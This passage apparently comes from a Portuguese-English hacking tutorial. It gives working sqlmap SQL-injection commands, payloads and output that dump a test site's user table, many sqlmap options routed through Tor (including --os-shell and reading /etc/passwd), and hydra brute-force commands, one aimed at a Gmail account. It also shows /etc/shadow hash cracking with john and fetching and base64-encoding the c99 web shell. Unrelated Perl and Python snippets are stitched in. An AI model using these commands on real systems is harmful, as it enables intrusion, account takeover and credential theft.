[12:15:09] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0
(Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19
(KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19'
[12:15:09] [INFO] testing connection to the target URL
[12:15:14] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:15:14] [INFO] testing if the target URL is stable
[12:15:15] [INFO] target URL is stable
[12:15:15] [INFO] testing if GET parameter 'artist' is dynamic
[12:15:15] [INFO] confirming that GET parameter 'artist' is dynamic
[12:15:15] [INFO] GET parameter 'artist' is dynamic
[12:15:15] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be
injectable (possible DBMS: 'MySQL')
[12:15:16] [INFO] testing for SQL injection on GET parameter 'artist'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific
for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided
level (1) and risk (1) values? [Y/n] y
[12:15:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:15:20] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE
or HAVING clause' injectable
[12:15:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[12:15:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[12:15:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause
(BIGINT UNSIGNED)'
[12:15:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[12:15:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[12:15:23] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[12:15:24] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:15:24] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:15:25] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:15:25] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[12:15:26] [WARNING] time-based comparison requires larger statistical model, please wait.
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[12:15:26] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:15:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:15:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:15:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:15:27] [INFO] automatically extending ranges for UNION query injection technique
tests as there is at least one other (potential) technique found
[12:15:28] [INFO] ORDER BY technique seems to be usable. This should reduce the time
needed to find the right number of query columns. Automatically extending the range
for current UNION query injection technique test
[12:15:29] [INFO] target URL appears to have 3 columns in query
[12:15:31] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) -
1 to 20 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5619=5619
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:16:02] [INFO] testing MySQL
[12:16:02] [INFO] confirming MySQL
[12:16:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[12:16:03] [INFO] fetching database names
[12:16:03] [INFO] the SQL query used returns 2 entries
[12:16:03] [INFO] starting 2 threads
[12:16:03] [INFO] retrieved: acuart
[12:16:03] [INFO] retrieved: information_schema
available databases [2]:
[*] acuart
[*] information_schema
[12:16:03] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 12:16:03
----------------------------------------------
*** Digite o comando abaixo em um única linha:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"
--current-user --is-dba --current-db --hostname --time-sec=3 --threads=3
--technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or
damage caused by this program
[*] starting at 12:29:55
[12:29:55] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9)
Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
[12:29:55] [INFO] resuming back-end DBMS 'mysql'
[12:29:55] [INFO] testing connection to the target URL
[12:29:56] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 5619=5619
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-8736 UNION ALL SELECT CONCAT(0x7170716a71,
0x4973546243766278496f444b6b44654762736b496c61444a6c68577a61714c68665071516f6b7469,
0x716b717871),NULL,NULL-- -
---
[12:29:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5
[12:29:56] [INFO] fetching current user
current user: 'acuart@localhost'
[12:29:56] [INFO] fetching current database
current database: 'acuart'
[12:29:56] [INFO] fetching server hostname
hostname: 'rs202995'
[12:29:57] [INFO] testing if current user is DBA
[12:29:57] [INFO] fetching current user
[12:29:57] [WARNING] in case of continuous data retrieval problems you are advised to
try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[12:29:57] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 12:29:57
----------------------------------------------
Extraindo o conteúdo dos campos:
Digite a linha abaixo em uma única linha:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2"
-D acuart -T users-C uname,pass,cc,name --dump --time-sec=3
--threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0)
Gecko/20100101 Firefox/25.0" --tor-type=SOCKS5 --tor-port 9050
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201603300a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Developers assume no liability and are not responsible for any misuse
or damage caused by this program
[*] starting at 13:33:01
[13:33:01] [INFO] fetched random HTTP User-Agent header from file
'/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE}
(Macintosh; I; PPC)'
[13:33:02] [INFO] resuming back-end DBMS 'mysql'
[13:33:02] [INFO] testing connection to the target URL
[13:33:02] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=2 AND 4071=4071
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-9556 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,
0x554a4f78466953624f7376665a524e7a4c5867666476706566546a49634e6f545a76784d6c4a5745,
0x716b706a71)--
---
[13:33:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.12
[13:33:02] [INFO] fetching entries of column(s) 'cc, name, pass, uname'
for table 'users' in database 'acuart'
[13:33:02] [INFO] the SQL query used returns 1 entries
[13:33:02] [INFO] resumed: "1234-5678-2300-9000","teste","test","test"
[13:33:02] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users[1 entry]
+-------+------+---------------------+-------+
| uname | pass | cc | name |
+-------+------+---------------------+-------+
| test | test | 1234-5678-2300-9000 | teste |
+-------+------+---------------------+-------+
[13:33:02] [INFO] table 'acuart.users' dumped to CSV file
'/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[13:33:02] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 13:33:02
10 - Some more SqlMap Parameters
Digite a linha abaixo e uma única linha:
proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
Digite a linha abaixo e uma única linha:
proxychains sqlmap -u "vul_url" --dbs --time-sec=3 --threads=3 --technique=BEUS
--random-agent --no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
Digite a linha abaixo e uma única linha:
proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
proxychains sqlmap -u "vul_url" --current-user --is-dba --current-db --hostname
--time-sec=3 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
----------------------------------------------
proxychains sqlmap -u "vul_url" --dbms=mysql -D data_base -T table --dump -C login,senha
----------------------------------------------
--level=3 --risk=3 --retries=3 --flush-session --hex --no-cast --batch --banner
--current-user --is-dba --current-db --hostname
--current-user --is-dba --parse-errors -v 3 ( show errors, messages )
--batch --tables --columns -T password --threads=8
--batch --dump -T password -C admin,pass --threads=8 --fresh-queries
--batch --banner --current-user --current-db
--users --current-db --dbs --exclude-sysdbs --tables --columns --flush-session —batch
--level=3 --risk=3 --forms --batch --banner --flush-session
--level=3 --risk=3 --forms --batch --banner --flush-session -p referer
--level=3 --risk=3 --flush-session --technique=B --batch
--level=3 --risk=3 --retries=3 --flush-session --hex --no-cast --batch --banner
----------------------------------------------
--technique=BEUST -s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt
--fresh-queries > /root/scan_out.txt
----------------------------------------------
--data=‘cat payload’ prefix="1’,1;" --suffix="-" --dns-domain=acme.com --os-shell
--fresh-queries --retries=5
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
----------------------------------------------
--dbms=mysql --level=3 --risk=3 --time-sec=3 --threads=3 --technique=BEUS --random-agent
--no-cast
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050 --tamper="between,randomcase,space2comment"
--data "login#2*&senha=123#1*" --alert --crawl=CRAWLDEPTH --regexp --string
--text-only --cookie "security=low; PHPSESSID=daa2374033f2a5fa6b57d9cc22692301"
----------------------------------------------
--batch --file-read="/etc/passwd”
--batch --forms --flush-session --delay=5 --tech=T --hex --crawl=3
--sql-query "SELECT * FROM users”
--sql-query="SELECT user,pass FROM usuarios WHERE user LIKE '%admin%’"
--sql-query "UPDATE SET user ‘jura' WHERE username ‘aris' FROM databaseX.admin" -v 2
–-sql-query=”select * from transactions.sample_tran_table”
--users --passwords --privileges --roles --threads=10
--forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3
--dbms="Microsoft Access"
-–dbms=”Microsoft SQL Server”
--dbms="PostgreSQL"
----------------------------------------------
--data "username=login#2*&senha=123#1*" --dbms=mysql --alert
--crawl=CRAWLDEPTH -level=5 --regexp --string --text-only
----------------------------------------------
--time-sec=7 --threads=3 --technique=BEUS --random-agent
--headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0"
--tor-type=SOCKS5 --tor-port 9050
*** #2* e #1* Indica que são campos posts e os mesmo devem ser injetados
----------------------------------------------
proxychains sqlmap -u "vul_url/index.php?page=login.php" --method "POST" --data
"user_name=admin&password=adminpass&Submit_button=Submit"
----------------------------------------------
-D mysql --sql-query="select usuario, senha from mysql.usuarios order by usuario desc"
-D mysql --sql-query="select column_name from information_schema.columns where
table_name = 'usuarios'"
----------------------------------------------
11 - Setting up dvwa lab
Instalando Laboratório DVWA
No Kali abra o navegador Firefox e a url -> www.dvwa.co.uk
clique no botão "download", será baixado dentro da pasta "Downloads" o arquivo "DVWA-master.zip"
cd Downloads unzip DVWA-master.zip mv DVWA-master /var/www/html/dvwa cd /var/www/html chmod -R 755 dvwa cd dvwa/config cp config.inc.php.dist config.inc.php
-----------------------------
Altere algumas linhas abaixo...
nano /var/www/html/dvwa/config/config.inc.php
$DBMS = 'MySQL';
# Deixe as linhas abaixo como abaixo:
$_DVWA = array();
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '';
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
-----------------------------
mysql -u root -p create database dvwa; quit
-----------------------------
chmod -R 777 /var/www/html/dvwa/hackable/uploads/ chmod -R 777 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
-----------------------------
nano /etc/php/7.0/apache2/php.ini
allow_url_include = on
-----------------------------
service apache2 start service mysql start service mysql status service apache2 status
-----------------------------
http://192.168.2.193/dvwa/setup.php User: admin Pass: password
Digite o ip do servidor ( kali ) e clique no botão "Submit"
-----------------------------
File Inclusion
http://192.168.2.193/dvwa/vulnerabilities/fi/?page=include.php
http://192.168.2.193/dvwa/vulnerabilities/fi/?page=/etc/passwd
12 - Cracking password with "hydra"
No terminal do Kali 2.0 digite os comandos abaixo:
nmap -sS -sC -sV 192.168.2.193
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-12 01:07 EDT
Nmap scan report for 192.168.2.193
Host is up (0.0000020s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 7d:a9:70:d3:55:c8:cc:6e:c4:ca:c9:c0:0b:bd:3a:a3 (RSA)
|_ 256 dc:c1:af:2d:fc:d4:a6:6a:49:5e:4d:b8:d2:9a:d1:19 (ECDSA)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Example 1 hydra -l jura -P passlist.txt 192.168.2.193 ssh -v -V Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 01:01:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://192.168.2.193:22
[INFO] Successful, password authentication is supported by ssh://192.168.2.193:22
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "123" - 1 of 6 [child 0] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "jura" - 2 of 6 [child 1] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "eu" - 3 of 6 [child 2] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "pizza" - 4 of 6 [child 3] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "test" - 5 of 6 [child 4] (0/0)
[ATTEMPT] target 192.168.2.193 - login "jura" - pass "teste" - 6 of 6 [child 5] (0/0)
[22][ssh] host: 192.168.2.193 login: jura password: 123
[STATUS] attack finished for 192.168.2.193 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 01:01:35
Vamos criar um arquivo com algumas senhas.
cat > passlist.txt
123
jura
eu
pizza
test
teste
admin
winner
ctrl + d ( salvar e sair )
Example 2 hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/passlist.txt Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:01:01
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 42 login tries (l:7/p:6), ~0 tries per task
[DATA] attacking service ftp on port 50000
[50000][ftp] host: 192.168.2.13 login: ewb1 password: 123
[50000][ftp] host: 192.168.2.13 login: ftp1 password: 123
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:01:16
Criando um arquivo usuários.
cat > users.txt
root
admin
administrator
ewb
ewb1
ftp
ftp1
ctrl + d ( salvar e sair )
cat > passlist.txt
123
jura
eu
pizza
test
teste
ctrl + d ( salvar e sair )
Outra forma seria usarmos o arquivo um dicionário de senhas do Kali -> rockyou
No terminal do Kali vamos procurar o arquivo.
locate *rockyou*
Descompacte-o.
gunzip /usr/share/wordlists/rockyou.txt.gz
Mova o arquivo para o diretório root.
mv /usr/share/wordlists/rockyou.txt /root/rockyou.txt
Listando arquivo.
ls -lh
-rw-r--r-- 1 root root 134M Mar 3 2013 rockyou.txt
Or ... download wordlist
mkdir -p /usr/share/wordlists/
git clone https://github.com/danielmiessler/SecLists/ /usr/share/wordlists/
cd /usr/share/wordlists/Passwords/Leaked-Databases/
tar -xvzf rockyou-withcount.txt.tar.gz
tar -xvzf rockyou.txt.tar.gz
ls -lhS rock*
1 jura jura 243M Sep 23 2015 rockyou-withcount.txt
1 jura jura 134M Sep 23 2015 rockyou.txt
-rw-r--r-- 1 root root 54M Nov 30 15:20 rockyou-withcount.txt.tar.gz
-rw-r--r-- 1 root root 51M Nov 30 15:20 rockyou.txt.tar.gz
-rw-r--r-- 1 root root 468K Nov 30 15:20 rockyou-75.txt
-rw-r--r-- 1 root root 337K Nov 30 15:20 rockyou-70.txt
-rw-r--r-- 1 root root 239K Nov 30 15:20 rockyou-65.txt
-rw-r--r-- 1 root root 167K Nov 30 15:20 rockyou-60.txt
-rw-r--r-- 1 root root 113K Nov 30 15:20 rockyou-55.txt
-rw-r--r-- 1 root root 75K Nov 30 15:20 rockyou-50.txt
-rw-r--r-- 1 root root 48K Nov 30 15:20 rockyou-45.txt
-rw-r--r-- 1 root root 31K Nov 30 15:20 rockyou-40.txt
-rw-r--r-- 1 root root 20K Nov 30 15:20 rockyou-35.txt
-rw-r--r-- 1 root root 12K Nov 30 15:20 rockyou-30.txt
-rw-r--r-- 1 root root 7.1K Nov 30 15:20 rockyou-25.txt
-rw-r--r-- 1 root root 4.0K Nov 30 15:20 rockyou-20.txt
-rw-r--r-- 1 root root 1.9K Nov 30 15:20 rockyou-15.txt
-rw-r--r-- 1 root root 723 Nov 30 15:20 rockyou-10.txt
-rw-r--r-- 1 root root 104 Nov 30 15:20 rockyou-05.txt
rm *.tar.gz
du -sch /usr/share/wordlists/Passwords/
282M /usr/share/wordlists/Passwords/
282M total
hydra -l jura -p /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.10.108 -t 4 ssh
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.105 -t 4 -e nsr ssh
hydra -l root -P /usr/share/wordlists/Passwords/Leaked-Databases/rockyou-withcount.txt 192.168.1.105 -t 4 -e nsr ssh
Usando o dicionário.
hydra 192.168.2.13 ftp -s 50000 -L /root/users.txt -P /root/rockyou.txt Example 3 hydra -l root -P passlist.txt 192.168.2.13 ssh Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-12 02:11:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries (l:1/p:6), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.2.13 login: root password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-05-12 02:11:58Example 4
Brute force em um email do google.
hydra -S -l emailx@gmail.com -P /usr/share/wordlists/nmap.lst -e ns -V -s 465 smtp.gmail.com smtp hydra -S -l 2helpmeout@gmail.com -P /root/users.txt -P /root/rockyou.txt -e ns -V -s 465 smtp.gmail.com smtp hydra -t 5 -V -f -l jura -P passlist.txt localhost ssh hydra -t 5 -V -f -l root -e ns -P passlist.txt localhost mysql
13 - Cracking passwords with john the ripper
No terminal do Kali 2.0 digite os comandos abaixo:
unshadow /etc/shadow /etc/passwd >> mypasswd.txt cat mypasswd.txt
root:$6$MH8TLS/Q$C3Vtt7RaOIcWXLcnva71/RPoj9TJ6g42xgCG0HqpJMPrkIAAKSLKjo2MRNgu3/wPiIaXg/PFB9w9gPq/mQhXC.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:*:104:65534::/nonexistent:/bin/false
mysql:!:105:109:MySQL Server,,,:/nonexistent:/bin/false
epmd:*:106:110::/var/run/epmd:/bin/false
Debian-exim:!:107:111::/var/spool/exim4:/bin/false
uuidd:*:108:113::/run/uuidd:/bin/false
rwhod:*:109:65534::/var/spool/rwho:/bin/false
iodine:*:110:65534::/var/run/iodine:/bin/false
miredo:*:111:65534::/var/run/miredo:/bin/false
ntp:*:112:114::/home/ntp:/bin/false
stunnel4:!:113:116::/var/run/stunnel4:/bin/false
redsocks:!:114:117::/var/run/redsocks:/bin/false
rtkit:*:115:118:RealtimeKit,,,:/proc:/bin/false
postgres:*:116:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dnsmasq:*:117:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:*:118:120::/var/run/dbus:/bin/false
arpwatch:!:119:122:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
usbmux:*:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sslh:!:122:126::/nonexistent:/bin/false
geoclue:*:123:128::/var/lib/geoclue:/bin/false
couchdb:*:124:129:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
avahi:*:125:131:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:*:126:65534::/var/run/sshd:/usr/sbin/nologin
colord:*:127:132:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:*:128:134::/var/lib/saned:/bin/false
speech-dispatcher:!:129:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:*:130:135:PulseAudio daemon,,,:/var/run/pulse:/bin/false
king-phisher:*:131:137::/var/lib/king-phisher:/bin/false
Debian-gdm:*:132:139:Gnome Display Manager:/var/lib/gdm3:/bin/false
dradis:*:133:140::/var/lib/dradis:/bin/false
beef-xss:*:134:141::/var/lib/beef-xss:/bin/false
jura:$6$Kxd.KdHp$VioUe6iuTfhFLUp0cC.2LcN5pQ0wqdQ44YPL.3fefmvY2IyVA2yCAGgui/.IouHIX2CuR873KeKXJsMNaWI7v/:1000:1000:,,,:/home/jura:/bin/bash
privoxy:*:121:65534::/etc/privoxy:/bin/false
debian-tor:*:135:125::/var/lib/tor:/bin/false
Debian-snmp:!:136:142::/var/lib/snmp:/bin/false
/usr/sbin/john --wordlist=passlist.txt --rules mypasswd.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
123 (root)
123 (jura)
2g 0:00:00:00 DONE (2017-05-12 02:33) 6.666g/s 213.3p/s 426.6c/s 426.6C/s 123..jura4
Use the "--show" option to display all of the cracked passwords reliably
Session completed
/usr/sbin/john --show mypasswd.txt
root:123:0:0:root:/root:/bin/bash
jura:123:1000:1000:,,,:/home/jura:/bin/bash
2 password hashes cracked, 0 left
14 - HashKiller
Decriptografando senhas "fracas" - Decrypting weak passwords.
The longer and the more characters mixed in the password the most difficult
will be to decrypt it.
http://www.hashkiller.co.uk/md5-decrypter.aspxSite para decriptografar hashes / senhas:
202cb962ac59075b964b07152d234b70
cat > hello.pl
#!usr/bin/perl
print "Enter your name: ";
$name=;
print "Hello, ${name} ... you will soon be a Perl addict!";
Running
perl hello.pl
20 - Compiling Python
Example 1
cat > p1.py
#!/usr/bin/python
print ("Hello World!")
print ("This is fun.")
Running.
python exe1.py
or go to the website https://repl.it/languages/python3
Copy the code above, paste it and click the button "Run"
Example 2
cat > p2.py
#!/usr/bin/python
name = raw_input('What is your name?\n')
print 'Hi, %s.' % name
Running.
python exe2.py
21 - Shell Base64 Encoding
http://www.localroot.net/
or
http://www.r57.gen.tr/
Choose shell c99
Colar no link abaixo e "encode", vai encodar em base64 gigante ...
http://www.freeformatter.com/base64-encoder.html
Clique ENCODE para gerar um codigo encriptografado gigante…
LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi
oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8NCi8qDQovKiAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAjICAgICMgICAgICAgICMgICAgIyAgICAgICAgICAgICAgICAgICAgICAgIC
